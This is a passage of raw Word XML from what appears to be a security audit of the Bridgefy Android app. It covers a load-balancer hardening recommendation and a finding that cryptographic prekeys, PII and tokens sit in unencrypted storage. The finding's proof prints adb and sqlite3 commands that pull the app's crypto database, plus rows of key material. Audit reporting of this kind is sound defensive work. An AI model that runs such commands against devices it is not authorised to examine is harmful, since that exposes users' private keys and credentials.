        </w:rPr>
        <w:t>integration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="363" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Drop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Invalid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>disabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>drop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>invalid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>163</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>consider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>deployment of the AWS WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>164</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. As logs are collected at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>ECS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>crucial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>collect additional access logs at ELB-level, unless more comprehensive insight is needed to analyze HTTP requests coming from the Internet. Please note that implementing the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>drop invalid headers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>AWS WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>options will provide some protection against</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>HTTP Smuggling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and other web-based attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250019" w:id="36"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-031</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP1/2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>PII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>inadequate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>KeyStore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Info</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the Android app and SDK fail to correctly leverage the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Android Keystore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>165</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, a hardware-backed security enclave ideal for secure storage of application secrets. The Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>SDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>stores</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>one-time-prekeys,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>signed-prekeys,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>identities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>an unencrypted database. Also, it was found that the Android app uses Firebase Authentication to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>authenticate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Firebase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>also</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>fails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>correctly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>leverage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Android Keystore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and was found to leak PII, authentication and FCM tokens on unencrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>files. This approach is insecure because that information could be accessed by a malicious attacker with physical access, memory access or filesystem access. Furthermore, given the large volume of publicly known Android kernel vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>166</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and high likelihood of users on unpatched Android devices, it should be assumed that malicious apps may be able to gain such access via privilege escalation vulnerabilities. At the time of writing, some sensitive items were found to be unsafely stored outside</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Android KeyStore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Android Encrypted Preferences</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>167</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. This issue was confirmed as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="1544" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>adb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pull</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/data/data/me.bridgefy.main.staging/databases/bridgefy-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>crypto.db sqlite3 bridgefy-crypto.db</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sqlite&gt; select * from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>signed_prekeys;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>6238256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>JFxwTFlhWSRhd1cwUlgyLkdMSG9KUmM0aFJ2Z0MjJiNMUStMaG4jYUpr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>bVthLFQlRC0vJUQwKzxV XC1CaF1KWlY1YkwnTCUrK1kvaTY0Rk1zUw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>==|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>KC1NIzxEIyxuXkBZIzMtY2JbPnVDLSgzUUFDbiQ0aW46W0NkVE BBXDdgXml3RzlraEIoK0lUbyYyNl9oKGpESV1JX2VwXlNmZDkoV2NbRTI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-1081290383</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="203"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
